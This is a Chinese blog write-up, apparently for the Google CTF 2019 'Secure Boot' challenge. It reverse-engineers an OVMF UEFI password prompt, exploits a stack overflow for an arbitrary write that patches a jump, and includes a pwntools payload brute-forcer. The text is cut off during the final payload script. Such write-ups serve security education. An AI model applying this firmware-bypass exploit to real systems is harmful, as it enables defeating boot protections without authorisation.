<!DOCTYPE html>
<html lang="zh-cn">
  <head><meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<meta name="description" content="Google CTF 2019 - Secure Boot 题解"/><meta name="keywords" content="pwn, QRZ's Blog" /><link rel="alternate" href="/blog/default" title="QRZ's Blog" ><link rel="shortcut icon" type="image/x-icon" href="/blog/favicon.ico?v=2.11.0" />
<link rel="canonical" href="http://www.qrzbing.cn/blog/2019/07/22/googlectf2019-secureboot/"/>

<link rel="stylesheet" type="text/css" href="/blog/lib/fancybox/jquery.fancybox.css" /><script type="text/x-mathjax-config">
    MathJax.Hub.Config({ tex2jax: { inlineMath: [['$','$'], ['\\(','\\)']] } });
  </script>
  <script type="text/javascript" async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<link rel="stylesheet" type="text/css" href="/blog/css/style.css?v=2.11.0" />

<script id="baidu_push">
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<script>
  window.config = {"leancloud":{"app_id":null,"app_key":null},"toc":true,"fancybox":true,"pjax":"","latex":true};
</script>

    <title>Google CTF 2019 - Secure Boot 题解 - QRZ's Blog</title>
  <meta name="generator" content="Hexo 5.3.0"></head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/blog/." class="logo">QRZ's Blog</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list"><a href="/blog/">
        <li class="mobile-menu-item">Home
          </li>
      </a><a href="/blog/archives/">
        <li class="mobile-menu-item">Archives
          </li>
      </a><a href="/blog/friends/">
        <li class="mobile-menu-item">Friends
          </li>
      </a></ul>
</nav>
<div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/blog/." class="logo">QRZ's Blog</a>
</div>

<nav class="site-navbar"><ul id="menu" class="menu"><li class="menu-item">
          <a class="menu-item-link" href="/blog/">
            Home
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/blog/archives/">
            Archives
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/blog/friends/">
            Friends
            </a>
        </li>
      </ul></nav>
</header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content"><article class="post">
    <header class="post-header">
      <h1 class="post-title">Google CTF 2019 - Secure Boot 题解
        </h1>

      <div class="post-meta">
        <span class="post-time">
          2019-07-22
        </span></div>
    </header>

    <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">Contents</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E8%AF%B4%E6%98%8E"><span class="toc-text">题目说明</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#About-OVMF"><span class="toc-text">About OVMF</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90"><span class="toc-text">题目分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B0%83%E8%AF%95"><span class="toc-text">调试</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B7%A5%E5%85%B7%E6%94%B6%E9%9B%86"><span class="toc-text">工具收集</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="toc-text">参考文章</span></a></li></ol>
    </div>
  </div><div class="post-content"><h1 id="题目说明"><a href="#题目说明" class="headerlink" title="题目说明"></a>题目说明</h1><p>Your task is very simple: just boot this machine. We tried before but we always get ‘Security Violation’. For extra fancyness use <code>socat -,raw,echo=0 tcp:$IP:$PORT&#39;</code>.</p>
<a id="more"></a>

<p>你的任务很简单：仅仅需要运行这台机器。我们尝试过，但是总得到 <code>Security Violation</code>(安全违规)。更花哨一点的使用方法是 <code>socat -,raw,echo=0 tcp:$IP:$PORT</code>。</p>
<h2 id="About-OVMF"><a href="#About-OVMF" class="headerlink" title="About OVMF"></a>About OVMF</h2><p>OVMF 是一种流行的开源 UEFI 固件，现在已经被移植到了 QEMU 上。它实现了 UEFI 的规范，因此和真实机器上的商用 UEFI 固件非常相似。</p>
<h1 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h1><p>如果直接运行官方提供的 py 文件是这个效果：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">UEFI Interactive Shell v2.2</span><br><span class="line">EDK II</span><br><span class="line">UEFI v2.70 (EDK II, 0x00010000)</span><br><span class="line">Mapping table</span><br><span class="line">      FS0: Alias(s):HD1a1:;BLK3:</span><br><span class="line">          PciRoot(0x0)&#x2F;Pci(0x1,0x1)&#x2F;Ata(0x0)&#x2F;HD(1,MBR,0xBE1AFDFA,0x3F,0xFBFC1)</span><br><span class="line">     BLK0: Alias(s):</span><br><span class="line">          PciRoot(0x0)&#x2F;Pci(0x1,0x0)&#x2F;Floppy(0x0)</span><br><span class="line">     BLK1: Alias(s):</span><br><span class="line">          PciRoot(0x0)&#x2F;Pci(0x1,0x0)&#x2F;Floppy(0x1)</span><br><span class="line">     BLK2: Alias(s):</span><br><span class="line">          PciRoot(0x0)&#x2F;Pci(0x1,0x1)&#x2F;Ata(0x0)</span><br><span class="line">     BLK4: Alias(s):</span><br><span class="line">          PciRoot(0x0)&#x2F;Pci(0x1,0x1)&#x2F;Ata(0x0)</span><br><span class="line"></span><br><span class="line">If Secure Boot is enabled it will verify kernel&#39;s integrity and</span><br><span class="line">return &#39;Security Violation&#39; in case of inconsistency.</span><br><span class="line">Booting...</span><br><span class="line">Script Error Status: Security Violation (line number 5)</span><br></pre></td></tr></table></figure>
<p>和题目中说的一样。</p>
<p>如果在这个输出之前按下 ESC 或 F12，就会有如下输出：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">BdsDxe: loading Boot0000 &quot;UiApp&quot; from Fv(7CB8BDC9-F8EB-4F34-AAEA-3EE4AF6516A1)&#x2F;FvFile(462CAA21-7614-4503-836E-8AB6F4662331)</span><br><span class="line">BdsDxe: starting Boot0000 &quot;UiApp&quot; from Fv(7CB8BDC9-F8EB-4F34-AAEA-3EE4AF6516A1)&#x2F;FvFile(462CAA21-7614-4503-836E-8AB6F4662331)</span><br><span class="line">****************************</span><br><span class="line">*                          *</span><br><span class="line">*   Welcome to the BIOS!   *</span><br><span class="line">*                          *</span><br><span class="line">****************************</span><br><span class="line"></span><br><span class="line">Password?</span><br></pre></td></tr></table></figure>
<p>如果我们随便输入的话会报错。从上面的输出中我们可以看到一个重要的函数（文件？）：UiApp</p>
<p>通过 UEFITool 工具我们可以得到下面的文件列表：</p>
<p><img src="https://raw.githubusercontent.com/40m41h42t/Images/master/2019/07/secboot-1.png"></p>
<p>通过 UEFI Firmware Parser 工具将其分离：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uefi-firmware-parser -ecO ./OVMF.fd</span><br></pre></td></tr></table></figure>
<p>我们可以在这一大串输出中定向找到 UiApp：</p>
<p>UiApp</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">File 38: 462caa21-7614-4503-836e-8ab6f4662331 type 0x09, attr 0x00, state 0x07, size 0x1beae (114350 bytes), (application)</span><br><span class="line">  Section 0: type 0x10, size 0x1be44 (114244 bytes) (PE32 image section)</span><br><span class="line">  Section 1: type 0x19, size 0x34 (52 bytes) (Raw section)</span><br><span class="line">  Section 2: type 0x15, size 0x10 (16 bytes) (User interface name section)</span><br><span class="line">  Name: UiApp</span><br><span class="line">  Section 3: type 0x14, size 0xe (14 bytes) (Version section section)</span><br></pre></td></tr></table></figure>
<p>分析该文件，我们可以找到 <code>Welcome to the BIOS!</code> 字符串：</p>
<p><img src="https://raw.githubusercontent.com/40m41h42t/Images/master/2019/07/secboot-2.png"></p>
<p>由于它是以 UTF-16LE 格式进行编码的，因此直接搜是搜不到的，搜索格式应该是 <code>W\x00e\x00l\x00 ...</code> 这样子的。</p>
<p>EFI 对输入的处理有一个数据结构：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> &#123;</span></span><br><span class="line">UINT16  ScanCode;</span><br><span class="line">CHAR16  UnicodeChar;</span><br><span class="line">&#125; EFI_INPUT_KEY;</span><br></pre></td></tr></table></figure>
<p>向前追溯可以找到某个函数，整理一下是这个样子的：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">signed</span> __int64 <span class="title">welcome_to_BIOS</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">unsigned</span> __int16 v0; <span class="comment">// ax</span></span><br><span class="line">  <span class="keyword">char</span> v2; <span class="comment">// [rsp+2Ch] [rbp-BCh]</span></span><br><span class="line">  __int16 v3; <span class="comment">// [rsp+2Eh] [rbp-BAh]</span></span><br><span class="line">  <span class="keyword">char</span> v4; <span class="comment">// [rsp+30h] [rbp-B8h]</span></span><br><span class="line">  <span class="keyword">char</span> buf[<span class="number">128</span>]; <span class="comment">// [rsp+38h] [rbp-B0h]</span></span><br><span class="line">  __int64 res; <span class="comment">// [rsp+B8h] [rbp-30h]</span></span><br><span class="line">  _QWORD *dest; <span class="comment">// [rsp+C0h] [rbp-28h]</span></span><br><span class="line">  __int64 size; <span class="comment">// [rsp+C8h] [rbp-20h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int16 i; <span class="comment">// [rsp+D6h] [rbp-12h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 tries; <span class="comment">// [rsp+D8h] [rbp-10h]</span></span><br><span class="line"></span><br><span class="line">  tries = <span class="number">0</span>i64;</span><br><span class="line">  size = <span class="number">32</span>i64;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">L&quot;****************************\n&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">L&quot;*                          *\n&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">L&quot;*   Welcome to the BIOS!   *\n&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">L&quot;*                          *\n&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">L&quot;****************************\n\n&quot;</span>);</span><br><span class="line">  dest = (_QWORD *)sub_11A8(<span class="number">32</span>i64);</span><br><span class="line">  <span class="keyword">while</span> ( tries &lt;= <span class="number">2</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    i = <span class="number">0</span>;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">L&quot;Password?\n&quot;</span>);</span><br><span class="line">    <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        res = (*(__int64 (__fastcall **)(_QWORD, <span class="keyword">char</span> *))(*(_QWORD *)(qword_1BC68 + <span class="number">48</span>) + <span class="number">8</span>i64))(</span><br><span class="line">                *(_QWORD *)(qword_1BC68 + <span class="number">48</span>),</span><br><span class="line">                &amp;v2);</span><br><span class="line">        <span class="keyword">if</span> ( res &gt;= <span class="number">0</span> )</span><br><span class="line">        &#123;</span><br><span class="line">          <span class="keyword">if</span> ( v3 )</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> ( res == <span class="number">0x8000000000000006</span>i64 )</span><br><span class="line">          (*(<span class="keyword">void</span> (__fastcall **)(<span class="keyword">signed</span> __int64, <span class="keyword">signed</span> __int64, <span class="keyword">char</span> *))(qword_1BC78 + <span class="number">96</span>))(</span><br><span class="line">            <span class="number">1</span>i64,</span><br><span class="line">            *(_QWORD *)(qword_1BC68 + <span class="number">48</span>) + <span class="number">16</span>i64,</span><br><span class="line">            &amp;v4);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">if</span> ( v3 == <span class="string">&#x27;\r&#x27;</span> )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">if</span> ( i &lt;= <span class="number">139u</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        v0 = i++;</span><br><span class="line">        buf[v0] = v3;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;*&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    buf[i] = <span class="number">0</span>;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">L&quot;\n&quot;</span>);</span><br><span class="line">    sha256((__int64)buf, i, (__int64)dest);</span><br><span class="line">    <span class="keyword">if</span> ( *dest == <span class="number">0xDEADBEEFDEADBEEF</span>i64</span><br><span class="line">      &amp;&amp; dest[<span class="number">8</span>] == <span class="number">0xDEADBEEFDEADBEEF</span>i64</span><br><span class="line">      &amp;&amp; dest[<span class="number">16</span>] == <span class="number">0xDEADBEEFDEADBEEF</span>i64</span><br><span class="line">      &amp;&amp; dest[<span class="number">24</span>] == <span class="number">0xDEADBEEFDEADBEEF</span>i64 )</span><br><span class="line">    &#123;</span><br><span class="line">      doSomething((__int64)dest);</span><br><span class="line">      <span class="keyword">return</span> <span class="number">1</span>i64;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;W&quot;</span>);</span><br><span class="line">    ++tries;</span><br><span class="line">  &#125;</span><br><span class="line">  doSomething((__int64)dest);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>i64;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>要求输入不多于 139 个字符，处理输入会用到 SHA256（通过某些特征数据可得）很明显要求 <code>buf</code> 经过哈希后得到 <code>0xDEADBEEF</code> 这样的数据。但很明显我们不可能得到哈希前的符合要求的数据，因此我们可以换一种方式。注意到输入是 139 而 <code>buf</code> 的大小只有 128，这会不会是一个溢出点呢？</p>
<p>我们可以溢出 12 位，接下来看一下它的栈帧：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> __int16 v0; <span class="comment">// ax</span></span><br><span class="line"><span class="keyword">char</span> ScanCode; <span class="comment">// [rsp+2Ch] [rbp-BCh]</span></span><br><span class="line">__int16 UnicodeChar; <span class="comment">// [rsp+2Eh] [rbp-BAh]</span></span><br><span class="line"><span class="keyword">char</span> v4; <span class="comment">// [rsp+30h] [rbp-B8h]</span></span><br><span class="line"><span class="keyword">char</span> buf[<span class="number">128</span>]; <span class="comment">// [rsp+38h] [rbp-B0h]</span></span><br><span class="line">__int64 res; <span class="comment">// [rsp+B8h] [rbp-30h]</span></span><br><span class="line">_QWORD *dest; <span class="comment">// [rsp+C0h] [rbp-28h]</span></span><br><span class="line">__int64 size; <span class="comment">// [rsp+C8h] [rbp-20h]</span></span><br><span class="line"><span class="keyword">unsigned</span> __int16 i; <span class="comment">// [rsp+D6h] [rbp-12h]</span></span><br><span class="line"><span class="keyword">unsigned</span> __int64 tries; <span class="comment">// [rsp+D8h] [rbp-10h]</span></span><br></pre></td></tr></table></figure>
<p>很明显可以溢出到 dest 上，也就是一个任意地址写。写到哪里比较合适呢？</p>
<p>一种思路是写这里：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( *dest == <span class="number">0xDEADBEEFDEADBEEF</span>i64</span><br><span class="line">      &amp;&amp; dest[<span class="number">8</span>] == <span class="number">0xDEADBEEFDEADBEEF</span>i64</span><br><span class="line">      &amp;&amp; dest[<span class="number">16</span>] == <span class="number">0xDEADBEEFDEADBEEF</span>i64</span><br><span class="line">      &amp;&amp; dest[<span class="number">24</span>] == <span class="number">0xDEADBEEFDEADBEEF</span>i64 )</span><br><span class="line">    &#123;</span><br><span class="line">      doSomething((__int64)dest);</span><br><span class="line">      <span class="keyword">return</span> <span class="number">1</span>i64;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">puts</span>((__int64)<span class="string">&quot;W&quot;</span>);</span><br><span class="line">    ++tries;</span><br><span class="line">  &#125;</span><br><span class="line">  doSomething((__int64)dest);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>i64;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我们看到，它在判断满足条件之后会进入一个函数然后返回 1，那么我们可不可以跳转到这里呢？看看这附近的汇编：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">.text:0000000000010062                 jnz     short loc_1007B</span><br><span class="line">.text:0000000000010064                 mov     rax, [rsp+0E8h+dest]</span><br><span class="line">.text:000000000001006C                 mov     rdi, rax</span><br><span class="line">.text:000000000001006F                 call    doSomething</span><br><span class="line">.text:0000000000010074                 mov     eax, 1</span><br><span class="line">.text:0000000000010079                 jmp     short done</span><br><span class="line">.text:000000000001007B ; ---------------------------------------------------------------------------</span><br><span class="line">.text:000000000001007B</span><br><span class="line">.text:000000000001007B loc_1007B:                              ; CODE XREF: welcome_to_BIOS+173↑j</span><br><span class="line">.text:000000000001007B                                         ; welcome_to_BIOS+1D4↑j ...</span><br><span class="line">.text:000000000001007B                 lea     rcx, strWrong   ; &quot;W&quot;</span><br><span class="line">.text:0000000000010082                 call    puts</span><br><span class="line">.text:0000000000010087                 add     [rsp+0E8h+tries], 1</span><br><span class="line">.text:0000000000010090</span><br><span class="line">.text:0000000000010090 loop_f:                                 ; CODE XREF: welcome_to_BIOS+73↑j</span><br><span class="line">.text:0000000000010090                 cmp     [rsp+0E8h+tries], 2</span><br><span class="line">.text:0000000000010099                 jbe     loc_FEC8</span><br><span class="line">.text:000000000001009F                 mov     rax, [rsp+0E8h+dest]</span><br><span class="line">.text:00000000000100A7                 mov     rdi, rax</span><br><span class="line">.text:00000000000100AA                 call    doSomething</span><br><span class="line">.text:00000000000100AF                 mov     eax, 0</span><br></pre></td></tr></table></figure>
<p>看上去很容易被利用哎：比较的最后一个跳转位于 0x10062，只需要在 0x1007B 处跳转到 0x10064 处就可以了！我们再看一下当前进程的  map：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; vmmap</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">               0x0           0x400000 rwxp   400000 0</span><br><span class="line">         0x63df000          0x6bdf000 rwxp   800000 0</span><br><span class="line">         0x6f2d000          0x772d000 rwxp   800000 0</span><br><span class="line">         0x7730000          0x7f30000 rwxp   800000 0</span><br><span class="line">         0x7ec0000          0x82c1000 rwxp   401000 0      [stack]</span><br><span class="line">        0x69326000         0x69b26000 rwxp   800000 0</span><br><span class="line">        0x6c246000         0x6ca46000 rwxp   800000 0</span><br><span class="line">        0x742e7000         0x74ae7000 rwxp   800000 0</span><br><span class="line">        0x752e6000         0x75ae6000 rwxp   800000 0</span><br><span class="line">        0x94af5000         0x952f5000 rwxp   800000 0</span><br><span class="line">       0x230246000        0x230a46000 rwxp   800000 0</span><br><span class="line">       0x2b808c000        0x2b888c000 rwxp   800000 0</span><br><span class="line">       0x7ebd7d000        0x7ec57d000 rwxp   800000 0</span><br></pre></td></tr></table></figure>
<p>全都是 rwxp！我们可以进行任意的修改操作。跳转的距离就是 0x7B - 0x64 = 0x17。所以任意写的过程中，使得修改后的汇编位 <code>jmp $-0x17</code> 即可在后面完成跳转。</p>
<p>接下来就是调试啦，我们要找到真实的环境中相应汇编的位置。</p>
<h2 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h2><p>在 <code>run.py</code> 中 <code>qemu</code> 的一大串参数中加入 <code>-s</code> 参数，之后就可以本地通过 gdb <code>target remote localhost:1234</code> 进行调试了。细节就不多说了，由于它会对输入也有一个处理，在进入输入函数之后通过 gdb 连接，此时位于输入处理函数中。我们看 stack，在 <code>rsp + 120</code> 的位置能看到返回地址</p>
<p><img src="https://raw.githubusercontent.com/40m41h42t/Images/master/2019/07/secboot-3.png"></p>
<p>对应的是 IDA 中的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.text:000000000000FF5E                 jmp     loc_FEDE</span><br></pre></td></tr></table></figure>
<p>这样我们就可以通过偏移获得 0x1007B 的位置：0x1007B - 0xFF5E + 0x67DAF5E = 0x67DB07B。</p>
<p>接下来我们要编写 payload 了。由于其中会进行一次 SHA256，因此我们要让 SHA256 的输出等于 payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"></span><br><span class="line">target = <span class="number">0x67db07b</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_sha</span>(<span class="params">myasm</span>):</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">1000000</span>):</span><br><span class="line">        payload = <span class="built_in">str</span>(i)</span><br><span class="line">        payload = payload.ljust(<span class="number">128</span>, <span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">        payload += <span class="string">&#x27;\x00&#x27;</span> * <span class="number">8</span> <span class="comment"># 截断</span></span><br><span class="line">        payload += p32(target)</span><br><span class="line">        <span class="keyword">if</span> binascii.unhexlify(hashlib.sha256(payload).hexdigest())[<span class="number">0</span>:<span class="built_in">len</span>(myasm)] == myasm:</span><br><span class="line">            print(<span class="string">&#x27;[1] payload: &#x27;</span>, payload)</span><br><span class="line">            payload = <span class="built_in">str</span>(i)</span><br><span class="line">            payload = payload.ljust(<span class="number">136</span>, <span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">            payload += p32(target)</span><br><span class="line">            print(<span class="string">&#x27;[2] payload: &#x27;</span>, payload)</span><br><span class="line">            <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line">find_sha(asm(<span class="string">&#x27;jmp $-0x17&#x27;</span>))</span><br></pre></td></tr></table></figure>
<p>这样我们就构造好了 payload。开始寻找的时候为什么要用 <code>payload += &#39;x00&#39;*8</code> 呢？因为我们覆盖了 res 那一部分，而 res 的值是会随着输入而变化的，因此第 128 位到 136 位都会被修改位为 NULL。而后面将这里填充可能是输入函数不会处理 <code>\x00</code> 这样的值，所以我们还得补充上去。</p>
<p>我们调试一下。下面汇编位置在输入后， Hash 函数之前。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">.text:000000000000FF6E                 movzx   eax, [rsp+0E8h+i]</span><br><span class="line">.text:000000000000FF76                 cdqe</span><br><span class="line">.text:000000000000FF78                 mov     [rsp+rax+0E8h+buf], 0</span><br></pre></td></tr></table></figure>
<p>0xFF6E 对应的下断点地址空间是：0x67DAF6E。</p>
<p>假如我们的输入是：<code>&#39;1&#39;*128+&#39;23456789abcd&#39;</code>，调试之后会发现栈中的内容是这样的：</p>
<p><img src="https://raw.githubusercontent.com/40m41h42t/Images/master/2019/07/secboot-6.png"></p>
<p>很明显 <code>23456789</code> 的部分被截断了。</p>
<p>最后，完整的 payload 构造如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span 